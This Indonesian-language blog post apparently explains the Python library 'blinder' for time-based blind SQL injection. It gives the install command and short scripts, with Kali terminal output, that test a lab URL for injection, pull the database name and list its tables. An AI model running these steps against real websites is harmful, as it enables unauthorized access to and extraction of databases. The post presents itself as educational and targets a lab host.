Library Blinder

Penjelasan Mengenai Library Blinder Pada Python

Pada artikel ini saya akan menjelaskan mengenai library pada python yaitu blinder pada artikel sebelumnya saya telah membahas mengenai apa itu library phonenumbers di sini. Ok simak saja langsung!


Blinder

Sebelum itu di sini saya hanya memberikan ilmu pengetahuan ataupun pembelajaran saja tentang mengenai pemrograman python dan library nya. Nah library blinder ini merupakan library sql injection kamu tahu kan sql injection itu? sql injection ini merupakan peretasan yang menyerang pada basis data atau server database, sql injection ini memaksa query database bernilai TRUE. Sql injection ini ada banyak cara atau metode, seperti metode time based blind sql injection, boolean based blind sql injection dan union. Saya tidak akan membahas mengenai sql injection secara mendalam karena hal tersebut konsep nya sangat panjang dan sesuai judul blog saya hanya membahas sebuah library nya saja.

Nah library blinder ini seperti yang saya bilang tadi merupakan library sql injection menggunakan metode time based blind sql injection metode tersebut sangatlah membutuhkan waktu lama agar bisa mendapatkan sebuah database, kamu bisa membuat program python atau tool menggunakan library tersebut. Ouh ya kamu bisa kunjungi github nya di sini. Nah saya akan memberikan penginstallan nya dan penggunaannya.

Penginstallan

pip install blinder

Penggunaan

Untuk menggunakan library blinder kamu harus import blinder untuk bisa menggunakan library tersebut contoh kamu bisa mengecek injeksi url pada program di bawah ini :

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

Hasil tersebut kamu bisa lihat di bawah ini :

root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

Kamu bisa mendapatkan nama database, bisa di lihat di bawah ini :

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

Hasil tersebut :

root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

Jika kamu ingin mendapatkan nama tabel kamu bisa lihat di bawah ini :

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

Dan hasil tersebut :

root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

Penutup

Itulah sebuah library python bernama blinder sebuah library itu akan memberikan kemudahan dalam segi pengembangan dan kamu tidak perlu mengulang program kamu itu dari nol karena library itu di dalamnya kode yang sudah di tulis oleh orang lain dan juga kamu bisa gunakan sesuai pada kebutuhan. Semoga bermanfaat :D